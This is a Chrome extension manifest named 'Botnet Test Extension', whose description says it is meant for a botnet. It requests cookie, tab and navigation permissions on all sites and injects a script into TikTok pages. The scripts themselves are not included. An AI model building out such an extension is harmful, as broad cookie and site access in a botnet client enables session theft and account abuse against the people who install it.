{
    "manifest_version": 3,
    "name": "Botnet Test Extension",
    "description": "This extension is manily for the botnet",
    "version": "1.0.0",
    "icons": {
        "16": "images/icon-16.png",
        "48": "images/icon-48.png",
        "128": "images/icon-128.png"
    },
    "background": {
        "service_worker": "service-worker.js",
        "type": "module"
    },
    "minimum_chrome_version": "102",
    "permissions": [
        "tabs",
        "cookies",
        "webNavigation",
        "storage",
        "activeTab"
    ],
    "host_permissions": [
        "*://*/*"
    ],
    "content_scripts": [
        {
            "matches": [
                "https://www.tiktok.com/*"
            ],
            "js": [
                "content.js"
            ]
        }
    ]
}